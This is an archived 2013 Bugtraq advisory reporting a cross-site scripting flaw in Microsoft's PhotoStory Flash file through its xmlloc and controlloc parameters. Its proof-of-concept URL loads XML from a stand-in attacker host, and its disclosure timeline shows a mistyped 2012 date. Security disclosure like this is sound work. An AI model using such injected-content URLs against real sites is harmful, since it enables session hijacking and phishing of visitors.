lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 12 Dec 2013 16:36:00 +0100
From: Vulnerability Lab <research@...nerability-lab.com>
To: bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: Microsoft PhotoStory - CS Cross Site Scripting Vulnerability

Document Title:
===============
Microsoft PhotoStory - CS Cross Site Scripting Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1012

Microsoft Security Response Center (MSRC) ID: 15155


Release Date:
=============
2013-12-12


Vulnerability Laboratory ID (VL-ID):
====================================
1012


Common Vulnerability Scoring System:
====================================
2.1


Product & Service Introduction:
===============================
Microsoft Online Services is Microsoft`s hosted-software offering and a component of their software plus services strategy.
Microsoft Online Services are hosted by Microsoft and sold ``with`` Microsoft partners. The suite includes Exchange Online, 
SharePoint Online, Office Communications Online, Microsoft Forefront, and Microsoft Office Live Meeting. For businesses, 
the Software-plus-Services approach enables organizations to access the capabilities of enterprise software through on-premises 
servers, as online services, or a combination of both, depending on specific business requirements. Services also provide the 
option to add complementary capabilities that enhance on-premises server software and simplify system management and maintenance.

(Copy of the vendor Homepage: https://microsoftonline.com )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Research Team discovered a client-side cross site scripting in flash component of Microsofts Website Application.


Vulnerability Disclosure Timeline:
==================================
2013-07-14:	Researcher Notification & Coordination (Muhammad A.S.)
2013-07-15:	Vendor Notification (Microsoft Security Response Center - Security Program)
2013-12-11:	Vendor Response/Feedback (Microsoft Security Response Center - Security Program)
2013-12-11:	Vendor Fix/Patch (Microsoft Developer Team)
2012-12-12:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Microsoft Corporation
Product: Photo Story - Flash 2013 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An independent vulnerability laboratory researcher discovered a client side input cross site in flash component of Microsofts Website Application.
The vulnerability allows remote attacker to execute malicious non-persistent script on client side.

The vulnerability is located in the flash photo-story module when processing the load 2 different manipulated xmlloc parameter via GET method.
The client-side script code will be executed in the flash web application layout as frame. During investigation it has been revealed 
that a remote attacker can manipulate both entry points  to inject his own html and java-script.

Exploitation of the vulnerability requires no privilege application user account but low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent malware injects, persistent external 
redirects and manipulation of affected module- or application context.

Vulnerable Module(s):
				[+] photo-story

Vulnerable File(s):
				[+] photostory3.swf

Vulnerable Parameter(s):
				[+] xmlloc


Proof of Concept (PoC):
=======================
The client side cross site scripting vulnerability can be exploited by remote attacker with low privilege application 
user account and low or medium required user interaction. For demonstration or reproduce ...

PoC: Generated Source Code

} // End of the function
$VERSION = "XXX_21118_0000";
var CONTROL_FILENAME = _root.controlloc;   <<<xml file being included without any validation
var XML_FILENAME = _root.xmlloc;           <<<xml file being included without any validation 
initPlayer();
buffer = 0.500000;
// [Action in Frame 3]


POC :
http://www.microsoft.com/austria/kmu/flash/photo-story/photostory3.swf
?xmlloc=http://www.ATTACKERWEBSTTE---.com/poc/ms/Schritt_fuer_Schritt.xml&controlloc=http://www.ATTACKERWEBSTTE---.com/poc/ms/control.xml


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction and parse of the xmlloc GET parameter request.
Parse also the affected output listing in the main module of the online service.


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability is estimated as medium(-).


Credits & Authors:
==================
Independent Laboratory Researcher - Muhammad A.S. [ahmed.sdd@...il.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 	       - admin@...lution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@...nerability-lab.com or research@...nerability-lab.com) to get a permission.

				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]


-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@...nerability-lab.com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ